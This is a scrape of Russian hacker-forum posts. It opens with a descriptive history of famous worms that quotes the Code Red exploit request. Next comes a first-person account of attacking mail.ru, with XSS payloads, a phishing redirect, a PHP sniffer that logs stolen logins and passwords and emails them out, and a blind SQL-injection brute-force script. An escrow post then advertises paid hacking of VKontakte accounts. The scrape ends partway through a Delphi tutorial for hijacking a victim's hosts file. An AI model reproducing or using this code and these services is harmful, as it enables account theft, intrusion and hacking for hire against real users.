Найденному силами ФБР Девиду Смиту, который и написал те три десятка строк кода на VB, грозили 10 лет тюрьмы, но парень «легко отделался», получив 20 месяцев заключения и штраф в $5000. Однако исходники червя еще долго мусолили хакеры, плодя различные модификации Melissa. 
 
 
                                                          Loveletter
 
В следующем году — новая почтовая эпидемия, вызванная вирусом Love Letter (или Love Bug). Письма, содержащие незамысловатое ILOVEYOU в строке темы, посыпались на ничего не подозревавших пользователей градом. И все было бы замечательно, если бы к письму не был приложен скриптик на Visual Basic Script, замаскированный под текстовый файл.
The Subject: ILOVEYOU
Message body: kindly check the
attached LOVELETTER coming from me.
Attached file: LOVE-LETTER-FORYOU.TXT.vbs
На лицо отличный пример социальной инженерии и прием двойного расширения, — что помогло скрыть подлинную природу файла. По умолчанию Винда не показывала второе, настоящее, расширение файла, поэтому принять аттач за обычный текстовик действительно было проще простого. Ну а коль пользователь файл запустил, можно делать свое дело. Написанная с использованием механизма Windows Scripting Host, малварь честно рассылает копии тела по всем адресам из адресной книги почтовой программы MS Outlook, после чего приступает к деструктивной части, закачивая и устанавливая в системе троя. Путь до исполняемого файла прописывался как домашняя страница в параметрах Internet Explorer. Это обеспечивало его автоматическую загрузку, а запуск в системе гарантировал специально созданный ключ в реестре. Далее домашняя страница возвращалась на свое место — и ушастый пользователь даже не замечал изменений. Тем временем, WIN-BUGSFIX.EXE или Microsoftv25.exe честно отправлял автору отснифанные пароли.
Трик с использованием двойного расширения автор заюзал не только в письмах. Для файлов целого ряда расширений, червь создавал свои копии, добавляя к их названию расширение .vbs. Если в папке был файл rulez.mp3, то тут же создавался rulez.mp3.vbs с телом червя — и так повсюду.
В основе другого способа распространения, который так же давал плоды, лежали скрипты для mIRC — самой распространенной программы для бешено популярных тогда IRC-чатов. Пользователям чата автоматически передавалась HTML-ка, предлагающая закачать некий ActiveX-элемент. Что находилось внутри, объяснять не надо, но поверь на слово: посмотреть, что прислал им хороший приятель, соглашались очень многие.
Первый случай активности Love Letter был зафиксирован 4 мая 2000 г., а уже через сутки им были частично или полностью поражены сети ЦРУ, NASA, Министерства энергетики, конгресса США, Пентагона, британской палаты общин и еще множества организаций. Ущерб, нанесенный червем в первые дни активности, был оценен в $5 миллионов. Офигительно? Виновника этого безобразия помог найти оставленный им автограф: «barok -loveletter(vbe) < i hate go to school > by: spyder / ispyder@mail.com / Manila,Philippines». Но в виду отсутствия местных законов за подобные преступления, никакой ответственности он не понес. 
 
 
                                                             Code Red
 
Из-за этого червя сайту Белого дома США в 2002 году пришлось поменять IP-адрес . Стартовавшего 13 июля 2001 года, Code Red интересовали виндовые машины с запущенным веб демоном IIS на борту и включенной системой индексирования. О существовании критической уязвимости, приводящей к переполнению буфера, в Microsoft знали задолго до появления вируса, а за месяц до эпидемии была опубликована заплатка. Впрочем, это не помешало запущенному 13 июля червю заразить за 6 следующих дней более 350 тысяч машин. Брешь в ISS позволяла легко выполнять на сервере удаленный код. Разработчики Code Red не сильно заморачивались и приделали эксплоит к простейшему сканеру, который работал «в лоб». Во время сканирования Code Red не проверял наличие IIS на новом компьютере-жертве, а тупо отправлял специально сформированные HTTP-запросы на сгенерированные случайно IP-адреса в надежде, что где-то на 80-порту окажется вожделенный IIS. Море запросов— огромный объем трафика. В итоге, оборудование попросту стало задыхаться от мусорных GET-запросов, которые генерировали ноды по всему мира. В логах Apache, на который, естественно, уязвимость IIS не распространялась, можно было обнаружить подобные строки:
GET /default.ida?NNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNN%u9090%u685
8%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%u9090%u6858%ucbd3%u7801%u9090%
u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0
В процессе работы Code Red не использовал никаких временных или постоянных файлов. Червь уникален: он существовал либо в системной памяти зараженных компьютеров, либо в виде TCP/IP-пакета при пересылке на удаленные машины. Но наличие заразы на сервере обнаруживалось без всякого антивируса. Поскольку в памяти компьютера могли существовать сразу сотни активных процессов Code Red, то тормоза и лаги были неизбежны. Червь заменял содержимое страниц на зараженных серверах на сообщение: «HELLO! Welcome to http://www.worm.com! Hacked By Chinese!», но был избирателен и дефейсил только те системы, где в качестве основного языка был установлен английский.Через некоторое время, правда, дефейс снимался автоматически: видимо, разработчики не хотели раньше времени терять драгоценную ноду.
Между 20 и 28 числами месяца тело червя должно было начать DoS-атаку на несколько IP-адресов, один из которых принадлежал американскому Белому дому.
В августе этого же года начал распространяться новый червь Code Red II, код которого, несмотря на схожее название, был создан заново и предоставлял владельцам полный контроль над зараженными машинами, копируя файл cmd.exe в каталог inetpubscripts ISS-сервера. В отличие от оригинального Code Red, клон старался атаковать хосты в той же подсети и не допускал одновременного запуска себя на одной системе. 
 
 
                                                         Nimda
 
Запустившегося в сентябре 2001 года червя ну никак не могли не связать с деятельностью Алькайды, заодно рассказывая о мощных технологиях, применяемых в новой заразе. Но если присказки о терроризме были выдумкой журналистов, то очевидная продвинутость нового червя была на лицо. Фишка Nimda заключалась сразу в нескольких каналах распространения, благодаря которым ему удалось в считанные минуты распространиться по Сети. Разберемся по порядку.
1. Наибольший пробив был получен за счет эксплоита, который использовал уязвимость в Internet Explore’е, позволяющую автоматически запускать приаттаченный к письму файл. Прикрепленный к письму README.EXE (написаный, кстати, на С++) беспрепятственно запускался на машине при простом открытия письма, и комфортно начинал свое распространение. Причем, для поиска новых адресатов вирус кропотливо сканировал текстовые документы на жестком диске, а также запрашивал с помощью специальной MAPI-функции список адресатов с сервера Microsoft Exchange.
2. Другой способ распространения — расшаренные ресурсы в локалке. После сканирования всех доступных шар Nimda создавал там файлы с почтовыми сообщениями, имеющие расширение .EML и .NWS.Открытие таких файлов происходит в почтовой программе, что автоматически влекло за собой заражение, как если бы письмо просто пришло по почте.
3. Не могли забыть создатели и про дырявый IIS, уязвимость в котором уже использовали другие черви. Поэтому Nimda довольно эффективно пробивал майкросовский веб-демон с помощью уязвимости directory traversal. В случае заражения веб-сервера на нем случайным образом выбирались странички, откуда начиналась загрузка вируса посетителям.
4. И еще интересный ход — Nimda не стеснялся и активно использовал для распространения бекдоры, оставленные в системах червями Code Red II и sadmind/IIS.
Добавим, что Nimda имел опасный побочный эффект, который мог допустить утечку конфиденциальной информации с зараженных компьютеров. Червь добавлял пользователя под именем «Guest» в группу пользователей «Администраторы». Таким образом, обычные гости получали полный доступ к ресурсам компьютера. Более того, все локальные диски открывались через шары для полного доступа.
Автор этого вируса официально не найден, но в теле червя содержится строка, указывающая, что создатель из Китая: «Concept Virus(CV) V.5, Copyright©2001 R.P.China» 
 
 
                                                       Slammer
 
Незадачливые жители стран Северной Америки были сильно удивлены, когда 25 января многие банкоматы попросту перестали работать. Во всем мире со сбоями работали службы по заказу и резервированию авиабилетов, многие сервисы вообще не были доступны. Но набивший оскомину финансовый кризис тут вовсе не причем — это лишь всплеск активности червя Slammer. Активность впервые замечена в 12:30 по среднеатлантическому времени, а к 12:33 количество зараженных машин удваивалось каждые 8.5 секунд.
В основе червя лежала уязвимость в Microsoft SQL Server, концепция которой была представлена David Litchfield на конференции BlackHat. Отправляя на 1434 скомпрометированный пакет, вирус мог выполнить на удаленной машине произвольный код и, в свою очередь, продолжить распространение. По различным отчетам сообщается, что вирусу удалось заразить 75.000 машин за каких-то десять минут, — но как? Уязвимый модуль IIS, позволяющий приложениям автоматически обращаться к нужной базе данных, принимал запросы как раз по UDP, а тело вируса, составляющее всего 376 байт, отлично помещалось в один единственный UDP-пакет. В результате Slammer не использовал тормозной TCP, требующий постоянных квитков-подтверждений, а рассылал себя по ненадежному UDP со скоростью несколько десятков запросов в секунду! Несмотря на то, что патч для уязвимости был выпущен за 6 месяцев до эпидемии, а вирус никак не проявлял себя на зараженной машине, последствия от Slammer’а были колоссальными. Роутеры и маршрутизаторы на магистралях были настолько перегружены трафиком, что лавинообразно выбивали другу друга в конце концов отключив некоторые бэкбоны. Южная Корея была полностью отрублена от инета и находилась в таком состоянии почти 24 часа. Только представь: никакого интернета и мобильной связи с внешним миром для 27 миллионов человек. Забавно, что многие жертвы даже не знали, что на их машине установлена такая специфическая вещь, как SQL. 
 
 
                                                         Sasser
 
Уж что-что, а окошко System Shutdown, инициированное NT AUTHORITYSYSTEM с обратным отсчетом и сообщением о принудительной перезагрузке компьютера видел почти каждый — годом ранее, во время эпидемии Blaster’а, либо же в 2004, когда стал бушевать во многом похожий на него Sasser. Принципиальная разница червей в том, что они используют критические уязвимости в разных службах. Для размножения Sasser использует баг переполнения буфера в службе Local Security Authority Subsystem Service (LSAS) — отсюда и название червя. Написанное на С++ тело Sasser в первоначальной версии открывает 128 параллельных потоков, и, используя специальный алгоритм по генерации IP-адресов, пытается найти системы с незащищенным 445 портом и уязвимым сервисом. Сплоит работал на «ура», правда, приводил к ошибке на системе пользователя. Sasser открывал на 9997 порту шелл, через который далее и заливалось все необходимое. Само тело червя без лишнего геморроя просто передавалось по протоколу через FTP, причем сервер также открывался на зараженных компьютерах на 5554 порту. Как часто бывает, шелл-код сплоита отличается от системы к системе, поэтому Sasser предварительно проверял версии удаленной системы, чтобы выбрать правильный набор параметров для атаки.
Оригинальная версия червя Sasser распространялась достаточно медленно, но через несколько дней в Сети были выпущены модификации, распространяющиеся гораздо быстрее. К этому моменту число зараженных машин измерялось сотнями тысяч, а в пике эпидемии речь шла о миллионах. В Финляндии были отменены рейсы местной авиакомпании, во многих странах закрыты некоторые отделения крупнейших банков. Автором заразы оказался 18-летний немецкий студент Свен Яшан, хотя изначально разрабатывался «русский след». Юного вредителя заложил кто-то из своих, позарившись на обещанное Microsoft’ом награждение в 250.000 баксов. Помимо Sasser, на компьютере парнишки нашли еще и многочисленные модификации червя Netsky. 
 
 
                                               Sony rootkit
 
Забавный факт: это единственный руткит, который распространялся легально! Win32/Rootkit.XCP, или «sony rootkit», является частью системы защиты аудио-CD,выпускаемых Sony BMG. Растроенная всепоглощающим пиратством компания решила бороться с нелегальным копированием с помощью DRM-компонентов (Digital Rights Management), а в попытке скрыть их присутствие в системе обратилась в компанию First 4 Internet, чтобы те написали маскирующий руткит. В итоге, система защиты дисков вместе с руткитом стала инсталлироваться на компьютер пользователя автоматически, когда в привод вставляется защищенный компакт диск. После установки, в системе появлялись два новых сервиса, которые и выполняли все функции. Установленный драйвер $sys$aries (aries.sys) скрывает все файлы и ключи в реестре, которые начинаются с «$sys$» посредством перехвата нативных API-функций. Win32/Rootkit.XCP отслеживает обращения к System Service Table (SST) и перехватывает обращения к функциям: NtCreateFile, NtEnumerateKey, NtOpenKey, NtQueryDirectoryFile, NtQuerySystemInformation. В результате удается скрыть присутствие ключей в реестре, папок, файлов и процессов.
Ты спросишь: а в чем, собственно, трабл? Ну, скрывает этот руткит работу нужных ему компонентов, что с того? Очень просто. Сразу после появления руткита, Марк Руссинович в своем блоге рассказал о многочисленных брешах в собственной защите программы. И был прав: очень скоро механизм, предназначенный для сокрытия файлов и процессов, быстро приспособили для своих нужд кодеры вирусов. Более того, распространение этого ноу-хао само по себе приводило к нестабильности системы, зависанию компьютера и потере данных из-за кривых драйверов, установленных в систему. И даже тогда, когда Sony выпустила специальную тулзу, избавиться от это дряни полностью было очень и очень затруднительно. 
 
 
                                                        Warezov
 
На дворе — 2006 год, только вот ушастые пользователи по-прежнему открывают все вложения в письмах, а программно им мало кто запрещает это делать. Результат? Огромный ботнет Warezov (он же Stration), который авторы сумели собрать за счет одноименного червя, рассылаемого по email. Никаких сплоитов и уязвимостей, — социальная инженерия и людская тупость. И ведь повсю трубят: «Не открывай вложений» — так ведь все равно кликают. Особенность червя Warezov — в огромном количестве вариаций, которые появлялись, как грибы после дождя. Был момент, когда новые модификации появлялись чуть ли не раз в 30 минут. Даже с обновленными антивирусными базами многие юзеры оставались не у дел. Впоследствии, когда на веб-серверах глобально начали вычищать все письма со зловредными аттачами, модификации перекинулись на IM-сети. А один из вариантов Warezov стал первым червем, который распространялся через Skype!
Как и подобает трою для ботнета, тело Warezov позволяло владельцам загрузить на компьютер любую заразу. Червь содержит в себе список жестко прописанных URL-адресов (что, конечно, минус), которые он проверяет на наличие файлов. В случае если по какому-либо из этих адресов будет размещен файл, он загрузится в систему и запустится. Основной модуль Warezov способен завершать различные процессы, а также останавливать и удалять службы антивирусных программ и персональных брандмауэров. Для организации рассылки червь использует собственный SMTP-сервер. Главное использование ботнета — это, конечно же, спам. Однако многие ноды служили для хостинга так называемых fast-flux платформ, позволяя спамерам прятать настоящее расположение их спамерских сайтов за IP-адресом жертвы. IP менялся настолько часто, что его невозможно было прикрыть. Warezov достигал этого двумя средствами: во-первых, reverse HTTP proxy, которая получала контент с настоящего (скрываемого) сайта, а также DNS-сервера, на котором специальная версия Bind под Windows меняла записи по нужному алгоритму. 
 
 
                                                      Storm
 
Ботнет, созданный с помощью червя Storm, можно смело назвать произведением искуства. Децентрализованная P2P-сеть, в которой большинство хостов сидит тихо и ждет указаний. Доменные имена разрешаются в постоянно меняющиеся IP-адреса (опять же fast-flux domains). Часть кода червя — полиморфная. В пике — более миллиона инфицированных хостов. Как это удалось?
Эпидемия червя началась с компьютеров в Европе и Соединенных Штатах 19 января 2008 года, когда, прикрываясь темой урагана в Европе, пользователям повалились письма с предложением открыть вложенный файл с названиями Full Clip.exe, Full Story.exe, Read More.exe или Video.exe.
Все попавшиеся на удочку машины автоматически объединялись в ботнет, но в отличие от других сетей, он не использовал специальный управляющий сервер, доступ к которому легко перекрыть. Принцип управления Storm больше напоминает пиринговую сеть, в которой зараженные ноды подключаются к своему управляющему хосту (он руководит обычно 30-45 зомби), а хосты взаимодействуют между друг другом. Причем роль хоста в случае необходимости может занять любая из нод. Вся сеть устроена так, что полного списка нодов нет ни у кого, поэтому точные размеры ботнета так и остались загадкой. По разным подсчетам, он варьировался от одного до нескольких миллионов машин.
Помимо функций по работе с ботнетом, Storm устанавливает в системе руткит: Win32.agent.dh, посредством которого держатели ботнета могли стащить любую конфиденциальную инфу, рассылать спам и устраивать мощные DDoS-атаки. 
 
 
                                                      Merboot
 
Загрузочные вирусы, о которых все благополучно успели забыть, возвращаются. В 2005 году на хакерской конференции Black Hat специалисты eEye Digital Security продемонстрировали концепт так называемого буткита, размещающего в загрузочном секторе диска код, который перехватывает загрузку ядра Windows и запускает бэкдор с возможностью удаленного управления по локальной сети. Презентация прошла на ура, а в 2008 году, после длительного затишья в области руткитов, выстрелил Mebroot. Новый троян использовал представленную еще в 2005 году идею и размещал свое тело в бут-секторе диска, после чего вносил модификации в ядро Винды, которые затрудняли обнаружение вредоносного кода антивирусами. Подцепить заразу мог кто угодно: компы заражались через свежие сплоиты с популярных сайтов. Вредоносный код сначала изменяет MBR (главная загрузочная запись), записывает руткит-части в сектора диска, извлекает из себя и устанавливает бэкдор в Windows, после чего самоудаляется. В результате заражения, в MBR размещаются инструкции, передающие управление основной части руткита, размещенного в разных секторах жесткого диска. Именно эта часть, уже после загрузки системы, перехватывает API-функции и скрывает зараженный MBR. Кроме традиционных функций по сокрытию своего присутствия в системе, вредоносный код устанавливает в Windows бэкдор, который занимается кражей банковских аккаунтов. 
 
 
                                                    Downadup
 
Червя, нашумевшего в январе, называют по-разному: Downadup, Conficker, Kido. Важно одно: новой малваре за несколько дней удалось заразить миллионы компьютеров, и собранный ботнет функционирует до сих пор. Разработчикам удалось лихо диверсифицировать способы распространения, объединив в одном черве сразу несколько успешных методик. Самый эффективный способ — приватный сплоит, использующий непропатченную систему с уязвимостью переполнения буфера MS08-067 в сервисе «Сервер» (патч вышел еще в октябре). Для этого червь отсылает удаленной машине специальным образом сформированный RPC- запрос, вызывающий переполнение буфера при вызове функции wcscpy_s в библиотеке netapi32.dll. На компьютере запускается специальный код-загрузчик, который скачивает с уже зараженной машины исполняемый файл червя и запускает его.
Кроме этого, червь отлично тиражирует себя через «Сетевое окружение», перебирая пароль администратора к системной шаре ADMIN$. А давно известный способ распространения через флешки претерпел изменения: в результате обфускации Autorun.inf (разработчики просто добавили в файл кучу мусора) удалось обмануть многие сигнатурные антивирусы. Несколько способов = максимальный эффект! Другая ключевая особенность заключается в том, как червь скачивает на зараженную машину трояна (для дальнейшей рассылки вируса, DDoS’а и т.д.). Разработчики отказались от размещения файлов на каком-то жестко зафиксированном серваке. Вместо этого код червя получает на нескольких популярных ресурсах текущую дату и по ней генерирует список из 250 доменов, используя специальный алгоритм. Задача хозяев ботнета — заблаговременно эти домены зарегистрировать и разместить там файлы для загрузки. Противостоять этому не столько сложно, сколько дорого.
Перехватывая API-вызовы, отвечающие за обращение к DNS, заразе долгое время удавалось сдерживать антивирусы, которые банально не могли обновиться, обращаясь к заблокированным доменам, содержащим слова kaspersky, nod, symantec, microsoft и т.д.



#250 Взлом Mail.ru: Непобедимых не бывает

Написано Admin : 28 Февраль 2016 - 09:43

Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у мэйла есть много других сервисов помимо почтового, в строке запроса я написал: site:*mail.ru. В ответ гугль вывалил 20 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры mail.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.mail.ru, при просмотре картинок выскакивало popup окно, запомнив адрес:
 
 
Я решил его подкорректировать, получилось вот что:
 
http://7ya.mail.ru/image.php?in="><font color=ORANGE size=10>Russian Net Hunters - Rulezzz</font>
 
Как видишь получилось - Russian Net Hunters Rulezzz. Одним из последних сервисов был форумы@mail.ru, я попробовал скуль-инжекшн через форму авторизации, но меня редиретнуло на страницу, в которой говорилось, что я не зарегистрирован, и тут мое внимание привлекла адресная строка:
 
 
Я решил проверить переменную target на XSS, набрав в адресной строке
 
 
Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы наивные юзеры сами присылали мне пароль. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело.
 
[next day...]
 
На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
 
http://talk.mail.ru/login.html?target="><script>location.href='Переадресацию на нашу фэйк форму'</script>
 
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы юзеры чувствовали себя сухо и комфортно . В итоге урл принял такой вид:
 
 
Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал юзера к себе на почту, вот код сниффера:
 
<?
$adminmail = "mymail@mail.ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]rn";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
 
echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>
 
Обратите внимание, как юзер попадает к себе на почту (строка 17):
 
<script>auth.submit();</script>
 
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный юзер решит, что произошли какие-нить сбои в работе службы DNS.
 
[testing...]
 
Для проверки всего сказанного я написал "жалостливое" письмо своей новой подружке от бедных админов support@mail.ru c просьбой кликнуть по ссылке... и вскоре в файле logs.txt появилась новая строчка... На следующий день pixcher нашел sql-inj:
 
 
Ошибка выполнения запроса!
 
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = 0 AND singer_id = '9''
 
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''9''' at line 1
 
Я не поверил своим глазам, но после нажатия на кнопку REFRESH баг не исчез =) Запрос к БД на число мелодий по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда я заметил, что запрос
 
 
выполняется и выдаёт нам кучу мелодий на скачивание, а запрос
 
 
выдаёт 0 => никакого списка рингтонов не отображает =), а это значит то, что можно посимвольно брутить поля базы данных! Для начало попробуем сбрутить имя пользователя БД user(). SQL функция substring(user(),1,1) выдёргивает из строки user() первый символ, а функция lower(substring(user(),1,1)) ещё и переводит его в нижний регистр. Запрос
 
http://mobile.mail.r...php?singer_id=9' AND lower(substring(user(),1,1))="a"/*
 
не выдал ни одного рингтона - а значит первая буква пользователя БД не "a" =(. Первый символ я подобрал вручную, запрос
 
http://mobile.mail.r...php?singer_id=9' AND lower(substring(user(),1,1))="i"/*
 
выдавал мне полный перечень музона и я понял, что для облегчения этого беспонтового ручного перебора нужно писать скрипт... Наш скрипт должен скачивать страницу, меняя в запросе ="a" на остальные символы английского алфавита и если в теле скаченной страницы присутствует наш список мелодий (практическим путём было выяснено, что такая страница содержит волшебное число 17107 ), то скрипт должен показать нам этот символ и перейти к поиску второго символа, то есть выполняя запросы, содержащие substring(user(),2,1) и т.д. Не долго думая я запусти блокнот и начал вбивать в него до боли знакомые строки любимого PHP. У меня получилось примерно так:
 
<?
# Скрипт для посимвольного брута полей БД by pixcher (http://runthes.ru)
set_time_limit(0); // пусть наш скрипт не обламывается, если перебор затягивается на длительное
время
$find="user()";# Искомая строка (здесь может быть любое поле БД в виде подзапроса)
$bruteline ='qwertyuiopasdfghjklzxcvbnm1234567890_+!@#$%^&* '"()';# Предполагаем, что исходная
строка состоит только из этих символов
$k=1;# Номер символа, который мы брутим (изначально первый =))
# Далее идёт функция для скачивания веб странички, адрес которой передаётся ей в параметре
function get_page ($link){
$url = parse_url ($link);
$scr = $url['path'];
$scr .= ($url['query'] > "")?"?".$url['query']:"";
$scr .= ($url['fragment'] > "")?"#".$url['fragment']:"";
$host .= $url['host'];
$port = ($url['port'] > "")?$url['port']:80;
$sock = fsockopen ($host, $port);
fputs ($sock, "GET /$scr HTTP/1.0rnHost: $hostrnrn");
$cont = "";
while (!feof ($sock)) { $cont .= fgets ($sock); }
fclose ($sock);
return $cont;
}
 
for ($i=0;$i<strlen($bruteline);$i++){ # запускаем цикл для всех наших символов
$link="http://mobile.mail.r...D lower(substri ng($find,$k,1))="$bruteline[$i]"/*";# Динамически изменяющийся запрос =)
$page=get_page($link);# Скачиваем страницу
if(strstr($page, "17107")){ # ...и если она содержит магическое число 17107...
echo "$bruteline[$i]"; # ...показываем найденный символ...
$i=0; # ...начинаем перебор заново...
$k++; # ...но для следующего символа
}}
?>
 
Запускаем наш скрипт и... видим имя пользователя БД: "inform@yavanna.mtu". Попробуем вместо $find="user()"; перебирать результаты подзапроса, например
 
$find="(SELECT password from mysql.user LIMIT 1)";
 
Запускаем скрипт, но он выдаёт... эх... подзапросы к сожалению не поддерживаются в почтовой БД =( Ничего страшного, UNION SELECT ещё никто не отменял, так что возможен такой перебор:
 
http://mobile.mail.r...hp?singer_id=-9' UNION SELECT 1 FROM mysql.user where user="inform" and lower(substring(password,1,1))="a"
 
но к этому моменту меня уже стало воротить от одной мысли о запросе к БД и я "вдруг" вспомнил, что неправомерный доступ к конфиденциальной информации карается законом =)
 
[end...]



#246 Как провести безопасную сделку?

Написано Admin : 28 Февраль 2016 - 08:42

s1ojKdKrVa0.jpg

Приветствую, дорогие посетители и пользователи форума, в связи с последними событиями и многочисленным кидаловом людей, мы решили вести прямую борьбу с этим беспределом и создали открытый сервис как для клиентов так и для специалистов.

Кому будет интересна безопасная сделка и в чем ее гарантии?
Тут все просто, Вы заказчик, не можете доверить сумму исполнителю и хотите работать без предоплаты, в свою очередь исполнитель тоже тратит средства на работу и не может быть уверен в Вашей стороне и по любым другим причинам не хочет выполнять заказ без платежа.
Лучший выход тут - безопасная сделка.90% возврата и выплаты средств любой стороне.

Преимущества сделки в том, что ни администратор, ни заказчик, ни исполнитель не смогут внести никаких поправок в сделку, все предельно честно, если работа не выполнена - средства на возврат, если выполнена - средства на выплату.
Схема работы: Заказчик ----> создание личного сообщения администратору-----> оплата в фонд форума ------> получение результата
Исполнитель -----> подтверждение в теме (которая будет создана администратором для сделки) ------> выполнение работы ------> получение средств.
МЫ НЕ ЯВЛЯЕМСЯ ГАРАНТОМ!!! Гарант - это схема не совсем честная, будьте бдительны!
Основные правила:

1. Сделку может провести абсолютно любой желающий пользователь и гость форума.

2. Все сделки и договоренности заключаются напрямую с исполнителем и клиентом, без участия третьей стороны, при условии открытии сделки на общее обозрение команде и пользователям форума
(по желанию заказчика соответственно).

3. Клиент и исполнитель обязаны действовать строго по заявке (см. ниже)

Заказчик или исполнитель создает сообщение администратору сайта с названием сделки например:

Тема: Взлом вконтакте
Текст: Совершаю сделку с пользователем admin (указывает ник исполнителя) , по услуге взлома вконтакте (описываете суть сделки), с правилами форума ознакомлен и согласен. Комиссию в фонд форума оплачиваю я. Сумма сделки: 10.000 рублей. Сроки работы : 2 дня. (Это пример!)


После второй оппонент сделки обязан отписаться, что принимает условия форума и подтверждает сделку.
Администратор подтверждает и одобряет сделку, сразу после оплаты суммы в фонд форума с комиссией. Сумма из фонда выплачивается исполнителю сразу, после Успешно выполненной работы.

4. Отвественность за сделку несет только сам заказчик и исполнитель, Администратор выполняет роль куратора сделки, но никаким образом не имеет к ней отношения.

5. Клиент либо исполнитель оплачивают единоразовый взнос в размере 10% за услуги безопасной сделки в фонд команды форума.

Наши гарантии :

1) Пройдена идентификация во всех платежных системах. (Webmoney, Yandex, QIWI, PM)
2) Чистая репутация с 2011 года, есть на всех закрытых площадках.
3) Принимаем оплату наличными и оплата любым удобным способом в платёжные системы.
4) Предоставим любые рекомендации нашей порядочности заинтересованным клиентам.

Запомните, мы отличаемся от гарантов, мы только курируем сделку,которая открыта всем оппонентам, благодаря этому, тут не может быть обмана, т.к все видят как завершилась сделка.

Ответы на вопросы:

1. Как заказать услуги хакера, чтобы меня не кинули?
- Создаете тему (сообщение Администратору) , по заявке написанной в верху данной темы, и ждете одобрение Администратора.
После того, как Администратор одобрил тему он вам предоставляет пароль от закрытой комнаты где и будет проходить сделка, находится там должны Администратор, вы и исполнитель. Оплачиваете взнос в фонд и исполнитель может начинать работать.
2.Может хакер как-то кинуть меня или обмануть через данную систему?
-Нет, ни Вы, ни хакер не смогут нарушить условия честной сделки, для этого любая сделка открыта для общего просмотра (На усмотрение клиента!) и ее курирует Администратор.
3. Что значит сделка открыта? Все смогут наблюдать каков мой заказ?
-Сделка открыта для большинства людей (рекомендуем закрытые комнаты), но всю приватную информацию (ссылку на анкету, сайт, почту и пр) видите только, Вы и хакер.
4. Для чего сделали открытые сделки?
- Для того, чтобы большинство людей видели как работает наша команда и борется с кидаловом. Открытые сделки помогают сохранить чистоту процесса и большинству пользователей подобрать нужного кандидата сделав вывод по его закрытым сделкам.
5. Что значит открытая и закрытая сделка?
- Открытая сделка - это когда вы дали заявку на работу и исполнитель ее подтвердил, но она еще в стадии выполнения. Закрытая сделка - это когда исполнитель выполнил работу и вы ее приняли без претензий.
Закрытые комнаты для сделок это отдельный форум где происходят сделки под контролем Администрации сайта. Другие пользователи не видят и не имеют доступа к вашему личному заказу (если для вас это важно)
6. Могу ли я приглашать исполнителей не являющимися пользователями вашего форума?
- Да, мы только приветствуем такого рода решения.
7. Каким образом я могу сделать оплату в фонд форума?
- Мы принимаем любой удобный для вас способ оплаты.
8. Я должен оплатить сумму работы вам? Чем вы отличаетесь от гаранта?
- Верно, вы оплачиваете сумму работы в фонд форума, что является гарантией для исполнителя,что вы платежеспособный клиент. Для вас гарантия в том, что сможете забрать средства в любой момент, так же исполнитель не получит средства до окончания работы и вашего согласия. Сумма в полном размере передается исполнителю, ТОЛЬКО ПОСЛЕ ЗАВЕРШЕНИЯ РАБОТЫ.
Наше отличие от гаранта в том, что мы открываем сделки для просмотра, по желанию заказчика, чтобы пользователи не сомневались в безопасности и знали, что в любой момент могут прекратить сделку и вернуть свои средства.


P.S Перевод на банковскую карту,осуществляется по запросу заказчика - Основателю форума,Через ЛС Возврат денежных средств осуществляется только по заявке заказчика, и переводится только на те реквизиты с которых производилась оплата!
Срок возврата осуществляется в течении 3-5 часов,с момента подачи заявки!
Подать заявку на сделку через гарант вы можете по этой ссылке:
https://xakeram.ru/i...romMemberID=133

s1ojKdKrVa0.jpg


#241 Блокиратор вконтакте

Написано Admin : 28 Февраль 2016 - 08:35

Добрый день, сейчас опишу метод блокировки вконтакте средствами Delphi. Главное преимущество нашей идеи состоит в том, что она не требует хостинга. 
 
 
Наша программка будет редактировать всем известный файл hosts и поднимать на компьютере жертвы собственный http-сервер, таким образом компьютер жертвы и будет хостом для сайта, на который будет прописан редирект в хостс. 
Нам потребуется 
 
[1] Delphi 7 
[2] Установленная библиотека Indy 
 
Для начала создадим html-файлик, который станет страничкой, которую увидит пользователь, попытавшись войти на свой аккаунт. 
 
В нем я написал следующее
 
<html><title>Вконтакте Добро Пожаловать</title></head><div align=center><image src=12.bmp></div></html>
 
Не забудьте создать картинку с именем 12.bmp 
 
Моя картинка вот http://s49.radikal.r...88381aea11.bmp 
 
Теперь поместите наш файл и картинку в папку C:Windows 
 
Приступим к написанию веб-сервера. 
Кинем на форму idHTTPServer с закладки Indy Servers 
Назовем его Server 
 
В событии создания формы напишем
 
